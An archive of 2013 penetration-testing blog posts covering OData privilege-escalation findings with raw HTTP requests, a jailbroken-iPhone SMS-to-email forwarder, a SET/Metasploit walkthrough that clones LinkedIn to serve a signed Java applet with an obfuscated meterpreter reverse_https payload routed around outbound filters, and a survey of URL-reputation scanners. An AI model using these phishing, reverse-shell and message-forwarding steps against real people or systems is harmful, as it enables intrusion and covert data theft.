Tuesday, February 26, 2013

Evaluating OData Applications

By Gursev Kalra.

I was recently evaluating a SaaS provider's OData application, looking at how its client application communicated via OData with its backend servers. The client allowed SaaS consumers to schedule critical computation jobs, download the results, and perform additional actions using OData’s RESTful operations.

This blog post aims to provide an overview of our OData assessment methodology and also discusses a few interesting findings identified in the specific OData implementation we tested.

Understanding Our Target

The first step of any assessment is to gain an understanding of how the application functions. With OData applications in particular, you’ll want to explore all available functionality, monitor the communication using Fiddler, and then map out the RESTful operations and the URIs accessed for each feature. Once this is done, you should have a solid understanding of the application as well as its OData requests and responses. The specific application we were targeting had only one user role, so unless the Service Metadata Document review revealed additional functionality or features, we could test only for horizontal privilege escalation.

Looking at the RESTful operations, you should be able to determine the Service Root URI and the Service Metadata Document URI. For the application we were targeting, we leveraged these URIs to perform the following:

  1. We accessed the Service Root URI and it exposed several Feeds that were never referenced by the thick client. A win? Not until we can actually access real data.
  2. Next, we used Oyedata to perform automated analysis of the OData service (via its Service Metadata Document) and then exported the fuzzing templates to a text file for use with Burp Suite. The target OData service did not support the JSON format, so Oyedata’s ability to generate fuzzing templates in both JSON and XML formats was a lifesaver.
  3. We also downloaded the Service Metadata Document locally for manual analysis.
As a result of all of these steps we discovered several additional Feeds and functionalities that the thick client did not use. Interesting, huh? Let’s move on to the assessment phase.
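The Service Metadata Document review in step 3 above can be partially automated. Below is a minimal sketch of enumerating the EntitySets (the Feeds) a service exposes; the sample EDMX document is fabricated for illustration and stands in for a real `$metadata` download:

```python
# Sketch: enumerate EntitySets (Feeds) from a downloaded OData Service
# Metadata Document. The sample EDMX below is hypothetical; in practice
# you'd load the file saved from http://host/Service.svc/$metadata
import xml.etree.ElementTree as ET

EDM = "{http://schemas.microsoft.com/ado/2008/09/edm}"

sample_metadata = """<?xml version="1.0"?>
<edmx:Edmx xmlns:edmx="http://schemas.microsoft.com/ado/2007/06/edmx" Version="1.0">
  <edmx:DataServices>
    <Schema xmlns="http://schemas.microsoft.com/ado/2008/09/edm" Namespace="Demo">
      <EntityContainer Name="DemoEntities">
        <EntitySet Name="Users" EntityType="Demo.User"/>
        <EntitySet Name="Submissions" EntityType="Demo.Submission"/>
      </EntityContainer>
    </Schema>
  </edmx:DataServices>
</edmx:Edmx>"""

def entity_sets(metadata_xml):
    # Every <EntitySet> in the metadata document is a Feed worth probing
    root = ET.fromstring(metadata_xml)
    return [es.get("Name") for es in root.iter(EDM + "EntitySet")]

print(entity_sets(sample_metadata))  # ['Users', 'Submissions']
```

Comparing that full list against the Feeds the thick client actually touches is a quick way to spot the "extra" functionality discussed above.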


Oyedata is a tool I wrote to help with OData assessments, and it's pretty much required here. If you're unfamiliar with the tool, check out the video:


Now that you fully understand the application and have a good idea of what is available on the server side, you can begin to think about available attack vectors. Given what was available for our application, we proceeded to the attack phase with the following:

  1. Check for Horizontal Privilege Escalation.
  2. Identify what data/functionality was available through the additional Feeds discovered.
  3. Attempt RESTful operations that were not utilized by the thick client but were shown to exist via automated Oyedata analysis. Oyedata’s data generator also helped by generating random sample data, especially for cryptic data types like Edm.DateTime and Edm.DateTimeOffset.

A Few Interesting Findings

After exhausting our attack vectors (plus a few extra from our methodology) we came away with some interesting findings. Here are a few of them. We modified/obfuscated the output a bit as we’re still awaiting remediation confirmation from the vendor.

Passwords Were Stored in the Clear and Exposed via Feeds

The OData web service exposed the usernames and passwords of all users via its Users Feed. This finding highlights two important concerns:

  1. The affected Feed had misconfigured access control that allowed access to the Users table.
  2. The database stored user passwords in the clear.

Privilege Escalation

The thick client did not offer any functionality to add, update, or remove users, and the user role we had did not offer it either. However, it was possible to add new logins with the privileges of our user account by sending the following RESTful POST request (generated using Oyedata) to the OData service. It was also possible to update or delete other users with the test account we had.

 POST /XXXXXService.svc/RemoteLogins HTTP/1.1
 Host: www.vulnerablehost.com:8011
 Accept: application/atom+xml,application/atomsvc+xml,application/xml
 Content-Type: application/atom+xml
 Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop

 <?xml version="1.0" encoding="utf-8"?>
 <entry xmlns="http://www.w3.org/2005/Atom" xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata" xmlns:d="http://schemas.microsoft.com/ado/2007/08/dataservices">
   <content type="application/xml">
      <d:Password>newpassword</d:Password>
      <!-- additional entity properties omitted -->
    </content>
 </entry>

The application also allowed us to download the results of other users’ submissions and was found to be vulnerable to several instances of both horizontal and vertical privilege escalation attacks.

Application Logic Bypass

The client application did not provide any functionality to overwrite or delete past computation submissions; however, we were able to do both by abusing the OData web service, which was insecurely configured and allowed updates via the PUT method. Previous submissions could also be deleted by issuing the following request, where the value ‘100’ indicates the submission ID.

 DELETE /XXXXService.svc/Submissions(100) HTTP/1.1
 Host: www.vulnerablehost.com:8011
 Accept: application/atom+xml,application/atomsvc+xml,application/xml
 Content-Type: application/atom+xml
 Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop
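For illustration, the raw DELETE request above can be templated for arbitrary submission IDs. A minimal sketch (the host and service path mirror the redacted example; the Authorization header is omitted here):

```python
# Sketch: build raw DELETE requests like the one above for a given
# submission ID. Host/service names mirror the redacted example.
def build_delete(submission_id, host="www.vulnerablehost.com:8011",
                 service="/XXXXService.svc"):
    return (
        "DELETE {svc}/Submissions({sid}) HTTP/1.1\r\n"
        "Host: {host}\r\n"
        "Accept: application/atom+xml,application/atomsvc+xml,application/xml\r\n"
        "\r\n"
    ).format(svc=service, sid=submission_id, host=host)

request = build_delete(100)
print(request.splitlines()[0])  # DELETE /XXXXService.svc/Submissions(100) HTTP/1.1
```

Iterating the submission ID this way is also a quick check for insecure direct object references across other users' records.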


OData is a new protocol that attempts to be the JDBC/ODBC of the internet and add a new dimension to data access. Organizations that plan to implement OData should strive to learn more about this wonderful new protocol and the security risks involved, and secure it as part of the deployment process.

Tuesday, February 19, 2013

Forwarding SMS to Email on [Jailbroken] iOS

by KrishnaChaitanya Yarramsetty.

As with most ideas, this one also took shape out of a necessity to reduce manual work and dependencies in various scenarios. This blog post shows one of the many ways to read SMS messages from a jailbroken iPhone and forward them as email. There are ways to do this using a few Cydia apps, but they usually require you to register for an account or pay for the service, which was less than ideal for me.


  • iOS 5.1.1 (9B206) - Other versions may work as well
  • Python 2.7.3 to 3 via Cydia (cydia.radare.org)
  • SQLite 3.x via Cydia (cydia.radare.org)
  • adv-cmds via Cydia (apt.saurik.com)

SMS Storage

iOS stores a lot of data in sqlite databases which, in most cases, can be identified by their “.db” extension. SMS messages are stored in the following files:

  • /var/mobile/Library/SMS/sms.db
  • /var/mobile/Library/SMS/sms.db-shm
  • /var/mobile/Library/SMS/sms.db-wal

The sms.db-wal file is a "Write Ahead Log" that provides transactional behavior, while sms.db-shm is a shared-memory index file required to read sms.db-wal alongside the original sms.db.

sms.db is the main file and retains most of the data; the companion files are temporary in nature. The most recently received SMS messages go into the sms.db-wal file, which layers its own format on top of the standard sqlite structure used by sms.db. All three files are read with a single connect() call from the sqlite API.
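The single-connect() behavior is easy to demonstrate with a throwaway database (plain Python, nothing iOS-specific). The sketch below puts a database in WAL mode, leaves an un-checkpointed write sitting in the -wal file, and reads it back through a fresh connection:

```python
# Sketch: sqlite3.connect() transparently reads a database together with
# its -wal/-shm companion files. This throwaway example creates a
# WAL-mode database, commits a row (which lands in the -wal file until a
# checkpoint), and reads it back from a second connection.
import os, sqlite3, tempfile

path = os.path.join(tempfile.mkdtemp(), "sms.db")

conn = sqlite3.connect(path)
conn.execute("PRAGMA journal_mode=WAL")
conn.execute("CREATE TABLE message (address TEXT, text TEXT, read INTEGER)")
conn.execute("INSERT INTO message VALUES ('1234567890', 'hello', 0)")
conn.commit()  # the row now lives in sms.db-wal, not yet in sms.db

# A fresh connection still sees the row -- connect() consults all three files
reader = sqlite3.connect(path)
rows = reader.execute("SELECT text FROM message WHERE read=0").fetchall()
print(rows)  # [('hello',)]
```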

Reading the SMS Database

The first task at hand is to read the sms.db file and analyze the database to find out how iOS stores SMS messages. For whatever reason, many of the sqlite3 utilities seem to have problems opening the file.

Sqlite3.exe and SQLite Database Browser

Although the initial import worked using sqlite3.exe on Windows, attempts to query the sms.db file failed. I also tried SQLite Database Browser which resulted in the below error.

Cydia’s sqlite3 binary

We also tried to read the database file from within iOS using the sqlite3 binary that came with Cydia which proved to be futile:

Text Editor

With all of the utilities having problems reading the file, I decided to just open it in a text editor to determine if there was something wrong with it. Everything looked fine, so I searched the file for CREATE statements to determine where messages were stored, which produced the following structure:

 CREATE TABLE message (
 address TEXT, 
 date INTEGER, 
 text TEXT, 
 flags INTEGER, 
 replace INTEGER, 
 svc_center TEXT, 
 group_id INTEGER, 
 association_id INTEGER, 
 height INTEGER, 
 version INTEGER, 
 subject TEXT, 
 country TEXT, 
 headers BLOB, 
 recipients BLOB, 
 read INTEGER, 
 madrid_attributedBody BLOB, 
 madrid_handle TEXT, 
 madrid_version INTEGER, 
 madrid_guid TEXT, 
 madrid_type INTEGER, 
 madrid_roomname TEXT, 
 madrid_service TEXT, 
 madrid_account TEXT, 
 madrid_account_guid TEXT, 
 madrid_flags INTEGER, 
 madrid_attachmentInfo BLOB, 
 madrid_url TEXT, 
 madrid_error INTEGER, 
 is_madrid INTEGER, 
 madrid_date_read INTEGER, 
 madrid_date_delivered INTEGER);

With a potential idea of where SMS messages might be stored, I decided to use Python’s sqlite API to query the database directly.


smsDBQuery.py uses the standard SQLite API to connect to the sms.db and fetch all the unread messages using the below query:

 SELECT text from message where read=0 order by date desc

To use smsDBQuery.py, copy it to your device’s /var/mobile/Library/SMS/ directory and run it as follows:

What’s interesting to note is that sms.db contains even very old messages that aren’t displayed on the device. This is because sms.db-wal retains the latest state for the device’s UI, so only a subset of messages is shown.
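The script itself isn't reproduced in this post, but a minimal equivalent, assuming the message schema and query shown above, would look something like this (a throwaway database stands in for the real sms.db):

```python
# Sketch of what smsDBQuery.py plausibly does: open sms.db and fetch all
# unread messages, newest first. A throwaway database stands in for the
# real /var/mobile/Library/SMS/sms.db here.
import os, sqlite3, tempfile

db_path = os.path.join(tempfile.mkdtemp(), "sms.db")
conn = sqlite3.connect(db_path)
conn.execute("CREATE TABLE message (address TEXT, date INTEGER, text TEXT, read INTEGER)")
conn.executemany("INSERT INTO message VALUES (?,?,?,?)", [
    ("1234567890", 1, "old unread", 0),
    ("1234567890", 2, "already read", 1),
    ("1234567890", 3, "new unread", 0),
])
conn.commit()

def unread_messages(connection):
    # Same query as above: unread messages, most recent first
    cur = connection.execute(
        "SELECT text FROM message WHERE read=0 ORDER BY date DESC")
    return [row[0] for row in cur.fetchall()]

print(unread_messages(conn))  # ['new unread', 'old unread']
```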

Catching New Entries and Sending Email

We can use a SQL TRIGGER to catch insert events on the message table when new SMS messages are received. Our Python script will then take the message and send an email. We've created the following GitHub repo for all the code:

To accomplish everything, our program works as follows:

  1. Create a temporary message2 table in the original database that is a subset of the main table
  2. Write a TRIGGER on the insert event of the database and attach it to the main SMS table. The TRIGGER should read the latest message and insert it into the message2 table without altering any content in the original message table
  3. Have a secondary script regularly monitor the message2 table and send an email containing the message contents when a new entry is added. We’ll use the emailsent flag to track state
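The trigger and message2 table described in steps 1 and 2 might look like the following sketch; the column names here are assumptions based on the message schema shown earlier:

```python
# Sketch of the trigger described above: copy each newly inserted SMS
# into message2 with an emailsent flag, leaving the original message
# table untouched. Column names are assumptions based on the schema
# shown earlier; an in-memory database stands in for sms.db.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE message  (address TEXT, date INTEGER, text TEXT, read INTEGER);
CREATE TABLE message2 (address TEXT, date INTEGER, text TEXT, emailsent INTEGER);
CREATE TRIGGER sms_to_email AFTER INSERT ON message
BEGIN
    INSERT INTO message2 (address, date, text, emailsent)
    VALUES (NEW.address, NEW.date, NEW.text, 0);
END;
""")

# An incoming SMS (an INSERT on message) lands in message2 automatically
conn.execute("INSERT INTO message VALUES ('1234567890', 1, 'hi there', 0)")
pending = conn.execute(
    "SELECT text FROM message2 WHERE emailsent=0").fetchall()
print(pending)  # [('hi there',)]
```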


smsCreateTrigger.py creates the database trigger and the message2 table. You’ll only need to run this once to set the database up. I’d recommend backing up your sms.db just in case, and if you get any errors, inspect them thoroughly. If you run into problems, you can uncomment the DROP statements (and comment out the CREATE statements) to clean up the sms.db.


smsWatcher.py should be run in the background; it will poll the message2 table for new entries. Once it sees one, it’ll take the message and send out an email via SMTP. You’ll need to manually set the following variables within the script to the values applicable to your setup.

 fromaddr   : 'abc@gmail.com'
 toaddrs    : 'xyz@gmail.com'
 username   : 'abc'
 password   : '****'
 server     : smtplib.SMTP('smtp.gmail.com:587')
 smsfromaddress :('AXARWINF','6564567890',)

Note that we’re only forwarding messages from a specific address. If you’d like to forward all messages simply modify the SELECT statement to not use the address field.
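The core of a watcher like this, using the variables above, could be sketched as follows. The SMTP send is wrapped in its own function and stubbed out in the dry run at the bottom, so nothing is actually emailed here:

```python
# Sketch of smsWatcher.py's core loop: poll message2 for unsent rows,
# email each one, then flip the emailsent flag so nothing is forwarded
# twice. Account details mirror the variables listed above.
import sqlite3, smtplib
from email.mime.text import MIMEText

fromaddr, toaddrs = "abc@gmail.com", "xyz@gmail.com"
username, password = "abc", "****"
smsfromaddress = "6564567890"

def send_email(body):
    # Thin smtplib wrapper -- only invoked when a new message is found
    msg = MIMEText(body)
    msg["Subject"], msg["From"], msg["To"] = "New SMS", fromaddr, toaddrs
    server = smtplib.SMTP("smtp.gmail.com:587")
    server.starttls()
    server.login(username, password)
    server.sendmail(fromaddr, [toaddrs], msg.as_string())
    server.quit()

def forward_pending(conn, sender=None, send=send_email):
    # Fetch unsent rows (optionally only from one address), send each,
    # then mark them sent
    where = "emailsent=0" + (" AND address=?" if sender else "")
    args = (sender,) if sender else ()
    rows = conn.execute(
        "SELECT rowid, text FROM message2 WHERE " + where, args).fetchall()
    for rowid, text in rows:
        send(text)
        conn.execute("UPDATE message2 SET emailsent=1 WHERE rowid=?", (rowid,))
    conn.commit()
    return len(rows)

# Dry run against an in-memory table with a stubbed-out sender:
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE message2 (address TEXT, text TEXT, emailsent INTEGER)")
conn.execute("INSERT INTO message2 VALUES ('6564567890', 'ping', 0)")
sent = []
count = forward_pending(conn, sender=smsfromaddress, send=sent.append)
print(sent, count)  # ['ping'] 1
```

Dropping the `sender` argument forwards messages from every address, which matches the SELECT-statement modification described above.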

With all your variables set up, you can run the smsWatcher process. Be sure only one smsWatcher process is running at a time:

 python smsWatcher.py &

Tuesday, February 12, 2013

Configuring SET to Bypass Outbound Filters and Own the Day

By Melissa Augustine and Brad Antoniewicz.

The Social Engineering Toolkit (SET) is a great, easy to use tool for combining social engineering attacks with Metasploit’s extensive framework. However, SET doesn’t always work right out of the box for all networks. Depending on the target, you may need to tweak SET’s code and configuration to work a little better. In this article we’ll walk through a real-world attack scenario and discuss some tweaks that will help SET function a little better. We’ll use BackTrack 5 R3 for our SET-up (lolpunz).

Basic SET Configuration

We’ll use SET’s Java Applet attack vector for our attack. SET’s configuration file is stored within the /pentest/exploits/set folder on BackTrack. To edit:

 root@bt:/pentest/exploits/set# cd config
 root@bt:/pentest/exploits/set/config# vim set_config

The default configuration needs a little tweaking to work the way we want it to. Here’s what we recommend:

Enable Apache

By default SET uses a Python web server, which never seems to be as reliable as we’d like. If you’re expecting more than one user to connect, it’s best to leverage Apache.


Self-Sign the Applet

SET will automatically self-sign the Java applet that’s presented to the user. This makes things appear a little more official and makes Java happy.


Name It Something Convincing

It should go without saying that you’ll need to label the applet something “friendly” and convincing so that you don’t scare away users. It’s usually good to match the website you’ve cloned. In our example, we’re cloning LinkedIn, so we’ve set it to match that:

Enable the Java Repeater

The Java Repeater option tells SET to continuously prompt the user even after they’ve clicked “Cancel” on the applet prompt. While this is a bit of an aggressive move that may end up spooking some users, it often results in a higher success rate, so we go for it.


To lessen the impact of the repeater, we usually configure a delay (between when the user clicks “Cancel” and when they’re prompted again) of 5 seconds:


Starting SET and Cloning a Website

With the config file ready, we can start SET:
 root@bt:/pentest/exploits/set# ./set

SET is all menu driven, so once it starts up you’ll be presented with a banner and menu as shown below. Options 4 and 5 will always show regardless of whether SET is up to date, so don’t be confused if you just updated. Be sure to start with option 6 to make sure your configuration changes are active.

Website Cloning

One of SET’s awesome features is that it can clone a website of your choosing. We’ll use LinkedIn.com for this example. Select the following options:

 (1)Social-Engineering Attacks -> 
 (2)Website Attack Vectors ->
 (1)Java Applet Attack Method ->
 (2)Site Cloner

You’ll just need to provide a couple of options for the website cloner to get started. Here’s what we used:
 Are you using NAT/Port Forwarding? (no)
 IP address for the reverse connection (12.x.x.x)
        Next is the creation of the Java Applet:
 Name (LinkedIn)
 Organizational Unit (LinkedIn)
 Name of Organization (LinkedIn)
 City (Santa Monica)
 State (CA)
 Country (US)
        Is this correct? (yes)

 URL to clone (http://www.linkedin.com)

Payloads and Handlers

Metasploit offers tons of payloads we can deliver with our signed Java applet. SET leverages this functionality to make preparing and encoding payloads easy. It’ll also allow you to backdoor a legitimate executable and further obfuscate it. Most antivirus software will easily pick up unpacked, unencoded, or otherwise unobfuscated payloads, so it’s worth taking the time to do this. We manually generated, packed, and obfuscated a standard meterpreter payload since SET doesn’t support using hostnames as the target (more on this in the next section).

If you used SET to generate your payload, then you’re ready to go. However if you created your own, you’ll have to define it as a custom payload within SET:

  (17) Import Your Own Executable
 [path to executable]

We also needed to set up a handler to accept the connect-back from the payload we generated. With Metasploit running, set up the handler:

 msf> use exploit/multi/handler
 msf exploit(handler)>  set payload windows/meterpreter/reverse_https
 msf exploit(handler)>  set LHOST 11.x.x.x
 msf exploit(handler)>  set LPORT 443
 msf exploit(handler)>  set ExitOnSession false
 msf exploit(handler)>  exploit -j

Great, with SET serving our cloned linkedin.com and our meterpreter handler running, we can accept users. Once they arrive on the site they’ll be prompted to run the Java applet; if they click “Run” (hopefully), the applet will run and invoke our payload! All ready to go, right? Wrong...

Outbound filtering

Strong networks have tight outbound filtering rules which make data exfiltration and connect back shells difficult. Although most networks have at least some outbound filtering rules, they’re usually lax and can be bypassed with little effort. HTTP-80/HTTPS-443 is often permitted outbound but web filters and proxies can get in the way. Web traffic filtering appliances compare outbound traffic to a set of rules that allow or deny traffic depending on criteria defined by the administrator. The criteria can vary greatly depending on the organization’s needs - Sometimes an organization may choose to block websites that fall within a particular subject matter (e.g. known “porn”, “hacking”, etc.. sites) or based on reputation. Other times the organization may just prohibit access to hosts that exist within countries where attacks are known to originate. It really depends on the organization, but at the end of the day, the outbound filter can really make life a pain.

One oddly common filter we see denies access to IP addresses rather than hostnames. Many attacks connect back to an attacker-controlled host by IP address, so organizations use that heuristic to their benefit. Let’s talk about changing SET to defeat that!


Obviously it’s important to test your setup once you think everything should be up and running. When you’re confident in your configuration, make it live and hope for the best. Sometimes things don’t always work as you plan and you’ll have to rely on a bit of charm and wit.

A friendly employee can do wonders when you discover that people are clicking “Run” but aren't getting owned. First walk the user through getting to the website and ensure the applet loads properly. If you’re not getting a connect-back, have the user go directly to the URL that’s hosting the stager. This URL is dynamically generated by default, so you may have to check the Metasploit output to figure out where it is.

This first troubleshooting step is usually where you’ll find the issue. Most commonly it’s the organization’s outbound filtering rules. Have the user attempt to browse to IP addresses, hostnames, known sites, unknown sites, etc...

Modifying SET to work with Hostnames

Assuming we deduced during the troubleshooting step that the organization’s outbound filtering disallows HTTP/HTTPS access to IP addresses but allows browsing to hostnames, we can modify SET to work around that filter. By default, however, SET does not support hostnames. It’s a fairly easy code change to make it support them, but there’s an even easier way in the scenario we’ve described.

Java’s control panel allows you to view the Java Cache, which gives insight into where the applet is pulling the payload from. To view it in Windows, go to Control Panel – Java, then on the General tab under “Temporary Internet Files” click “View”.

You can see that our applet is headed to an IP address:

When SET clones a website, it adds in the HTML to support the Java applet and passes it a few parameters detailing its configuration. Parameters 1, 3, and 4 define the payload, so we just modify these to point to our hostname rather than an IP address. This is all stored within the index.html of your webserver. If you’ve been following along, we’re using Apache, whose default webroot on BackTrack is /var/www.
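The edit can be done by hand in /var/www/index.html, or scripted. Here is a hypothetical sketch; the parameter layout below is illustrative only, so inspect the index.html SET actually generated for the exact tags:

```python
# Sketch: swap the IP address for a hostname in the applet <param> tags
# of SET's generated index.html (/var/www/index.html when using Apache).
# The sample HTML and hostname below are illustrative, not SET's exact
# output -- check your own index.html for the real parameter tags.
import re

def repoint_applet(html, ip, hostname):
    # Replace every http://<ip> reference with http://<hostname>
    return re.sub("http://" + re.escape(ip), "http://" + hostname, html)

sample = ('<param name="1" value="http://12.34.56.78/msf.exe">\n'
          '<param name="3" value="http://12.34.56.78/msf.exe">\n'
          '<param name="4" value="http://12.34.56.78/msf.exe">')
patched = repoint_applet(sample, "12.34.56.78", "www.evilhostname.com")
print(patched.splitlines()[0])
```

The hostname you substitute must, of course, resolve to the same server that is hosting the payload.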

Now we can take a quick look at the Java Cache again to confirm:

That's it! Pwntime!

Got any more SET configuration Tips? Share in the comments below!


We contacted the developers of SET about supporting hostnames and they updated the version on GitHub to support it! Those guys rock!! Thanks!!

Tuesday, February 5, 2013

Evaluating Potentially Malicious URLs - Part 3

by Tony Lee.

This is the final part of a three part series covering how to handle potentially malicious URLs and IPs. In Part 1, Deobfuscating Potentially Malicious URLs, we laid the groundwork by covering policy, unshortening and deobfuscation. In Part 2 of the series, Attributing Potentially Malicious URLs, we continued with WHOIS, geoIP, and IP to URL. Finally, in Part 3 of this series (Evaluating Potentially Malicious URLs) we'll finish up with reputation and evaluating content.

IMPORTANT: Do not directly navigate to any sites that are present in this article. Some of the sites may no longer be available by the time you read this but I wouldn't press your luck.

For most of this article, we are using two sites that appear to be associated with a BlackHole Exploit Toolkit attack. The first site is believed to be a Traffic Direction Script (TDS). The second site is believed to be the browser detection server. The first site is not on the radar of many reputation sites because the infection appears to be relatively new and may be a legitimate site that had malicious javascript injected into it. The second site has a higher risk rating as you will see below.

First Get Permission If Needed

I won't force you to re-read this section but take this seriously and see the section of the same title in the First Article.


Reputation

Reputation simply means an opinion or belief about something or someone. In this case we will be asking security companies and organizations their opinions about an IP address or URL. These companies and organizations develop their opinions through a variety of means. Larger organizations like McAfee and Symantec use their vast footprint of product as sensors to discover, track, and trend potentially malicious files, IP addresses, and URLs. Each endpoint helps the cloud become more intelligent which in turn provides better protection to the end user. Both McAfee and Symantec explain how their reputation technology works below:

“McAfee Global Threat Intelligence (GTI) looks out across its broad network of sensors and connects the dots between the website and associated malware, email messages, IP addresses, and other associations, adjusting the reputation of each related entity so McAfee’s security products — from endpoint to network to gateway — can protect users from cyberthreats at every angle.”

Source: http://www.mcafee.com/us/mcafee-labs/technology/global-threat-intelligence-technology.aspx

“Symantec Insight is a reputation-based security technology that leverages the anonymous software adoption patterns of Symantec’s hundreds of millions of users to automatically discover and classify every single software file, good or bad, on the Internet.”

Source: http://www.symantec.com/business/support/resources/sites/BUSINESS/content/live/DOCUMENTATION/5000/DOC5077/en_US/Insight_v1.pdf

Asking McAfee or Symantec for a reputation means they will query their database of knowledge—thus it is different than asking a company or organization to evaluate a site for content—but the line can become blurred. For example, other security companies or organizations must first evaluate a site’s content in order to derive an opinion. Sites such as VirusTotal will let you know if they have already evaluated the site and will give you their immediate opinion or they give you the option to have them evaluate the site again. This is a perfect example of a site that does both—evaluate a site and provide their opinion of reputation.

There are many sites offering their perceived reputation about another site. We have listed our favorite picks below:


McAfee Trusted Source and SiteAdvisor

McAfee has two different pages that can provide IP/URL reputation: http://www.trustedsource.org/ and http://www.siteadvisor.com. First up is Trusted Source, which provides a site’s web and mail reputation (if available). While this does not provide much detail, it is usually fairly accurate.

Next is SiteAdvisor which is traditionally known to be a browser plugin that provides the risk ratings of Internet websites, however the site itself allows you to query for a particular site’s reputation. SiteAdvisor also has a high risk rating for our Blackhole TDS and second stage site.

In this case both Trusted Source and Site Advisor accurately identified our Blackhole TDS site AND the second stage redirect site as high risk sites.

Cisco IronPort SenderBase

IronPort's SenderBase provides email and web reputation; a big downside, however, is that it's a bit skimpy on details and reasoning (even after clicking "more details").

SenderBase missed the TDS with a risk rating of neutral, however it did have a poor reputation for the browser detection site:

Web of Trust (WOT)

Web of Trust operated in similar fashion to Cisco IronPort’s SenderBase: it missed identifying the TDS server but did correctly identify the second stage site as dangerous.

Norton (Symantec) Safe Web

Norton’s Safe Web reputation system is very similar to McAfee’s SiteAdvisor and worth checking out. In this particular case, they had no reputation data on our Blackhole TDS site or the second stage server that is the target of the obfuscated iframe redirect.

AVG Site Reports

While we recommend checking AVG Site Reports for their opinion on a site, we do not recommend using their button to visit the site. I know it is marketing for their product; however, there is an option to visit the site unsafely which will send the user there. Unfortunately, in this case AVG missed both the first and second stage attacker servers with a rating of “Currently Safe”.

TrendMicro Site Safety

TrendMicro Site Safety incorrectly classified the TDS site as being safe and did not have any data on the second site. Interestingly enough, their site states that since they did not have data on the second site, they will now go check it out for the first time. I am not sure how long that takes, but it is not instantaneous. ;)

F-Secure Browsing Protection

F-Secure’s Browsing Protection results are similar to TrendMicro’s. Both sites classified the TDS site as safe and had never heard of the second stage site, but will now go form their opinion.

Google Safe Browsing

Google’s Safe Browsing diagnostic page (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=[enter_site_here]) unfortunately missed both the first and second stage sites as well.

Webroot BrightCloud

Webroot’s BrightCloud missed the first stage TDS site like so many above; however, they did state that the second stage site had a moderate risk rating (similar to Cisco and WOT). The only problem with this site is the annoying captcha on the left hand side. Ugh!

Evaluating Content

For sites that do not rely on previous knowledge, the service must evaluate the current state of the site when you ask for it. We are splitting this category into two sections: services that run multiple scan engines, and services that utilize their own evaluation engines.

Multiple Scan Engines

When most people think of a site that uses multiple scan engines to provide results, they usually think of VirusTotal, and they are not wrong in doing so. That site is very good at using multiple scan engines; however, NoVirusThanks also has URLVoid and IPVoid services that are quite good as well. The best thing about using both sites is that they don’t have too much overlap in scan engines.


VirusTotal

One nice feature about VirusTotal is that it stores a history of previous queries. Because of this, it can very clearly tell you whether it has already scanned a site, when it scanned the site, and the detection ratio of its scan engines. It prompts you with the option to Reanalyse or View last analysis.

NoVirusThanks (URLVoid/IPVoid)

The makers of NoVirusThanks have created two services for scanning potentially malicious URLs and IP addresses: urlvoid.com and ipvoid.com. Because URLVoid does not use the exact same scan engines as VirusTotal, it makes a great second reference!

It is very subtle, but in the scan results below, notice the report field: it indicates that the data is 4 months old. The site does provide the option to rescan; however, it requires the user to enter a captcha.

Overall these sites are very valuable in providing multiple perspectives on a site’s maliciousness, but for the most part they stay at the surface. Even though both sites display a little more detail than just good or bad, they do not go into depth the way the next sites will. This is great for a first gut check, and also for people who may want to stay at a higher level with just a good or bad rating; others, though, may need to dig deeper and get more context about why a site is bad and what it is doing.

Web Analysis Engine

Web analysis engines are all over the chart in terms of usefulness. Some of them take hours to run (no kidding), some minutes, and some seconds. Some provide a detailed analysis with exploit detection, some provide the raw data with little to no exploit detection, and some just provide high level good or bad results. If you plotted these sites on a matrix of time versus detail, you would get hits all over the place. We have tried to sift through the plethora of sites online that claim to analyze URLs to bring you our top picks. Please note that this is based on our experience using the sites and our current Blackhole exploit toolkit example. Your mileage and opinion may vary; feel free to leave your opinion in the comments section at the bottom of the article.

Jsunpack and urlQuery are our top picks in terms of providing detailed yet actionable information. They have different detection mechanisms, but they are complementary rather than redundant.


urlQuery

According to the urlQuery site:

“urlQuery.net is a service for detecting and analyzing web-based malware. It provides detailed information about the activities a browser does while visiting a site and presents the information for further analysis.”

That is no lie either. We were very impressed with their thoroughness and exploit detection. Additionally, the advanced settings allow you to set a User Agent and a referrer, and let you know what version of Adobe Reader and Java they are running.

This site does take a little bit of time to run (45 seconds for our run), but it is not unreasonable, and it was worth every bit of that time because it was spot on…

This site provides the IP, ASN, location, a screenshot of the site, and the results of IDS detection from Suricata and Snort. Both engines were correct in reporting the following:

  • Suricata /w Emerging Threats Pro - Malware Network Compromised Redirect
  • Snort /w Sourcefire VRT - Compromised Website response - leads to Exploit Kit

One of the most useful sections of the site is the HTTP Transactions link which shows the next site that the Traffic Direction Script is sending us to:

If you were curious what the analysis of the second stage site looked like, we've included it below. That is an insane amount of javascript running on one site, and an insane amount of HTTP transactions to sites that are not recognizable. We can only imagine what nastiness lies beyond this; it would be a journey down the malware rabbit hole for sure.


Jsunpack

jsunpack (“A Generic JavaScript Unpacker”) did exceptionally well against both sites, similarly to urlQuery. This site also allows you to enter a customized referer, which we recommend doing so malware sites don’t pick up on the standard defaults. Jsunpack is handy in detecting the parameters of a site; however, the unique capability jsunpack provides is the ability to download the malicious files themselves. This is VERY dangerous and should only be performed on a malware analysis workstation in a malware analysis environment, but it is really handy for pulling the files apart manually. The output format takes a little getting used to, but it is very detailed and useful.

Since the data for these sites is similar to urlQuery’s results, I will instead include a screenshot from training I developed while investigating another incident to showcase jsunpack’s exploit detection (the last time I checked, the site was no longer serving malware, but don’t press your luck):

iseclab (wepawet)

wepawet by iseclab is also a site worth mentioning. It is similar to jsunpack in that it can handle javascript and PDFs; in addition, it also handles Flash. This site is very useful for looking at javascript writes, network activity, and redirects.


Sucuri SiteCheck

Sucuri’s SiteCheck did exceptionally well in finding the page that served up the malicious javascript as well as finding the target of the iframe redirect. It provides a few details about the site and blacklist data as well.

Ironically, Sucuri SiteCheck’s blacklist data shows that McAfee’s SiteAdvisor does not advise visiting this site (as we saw in the reputation section earlier). I would have to agree:

The second stage site is blacklisted by both McAfee’s SiteAdvisor and Sucuri Malware Labs.

Other sites worth trying that unfortunately did not perform well on this example:


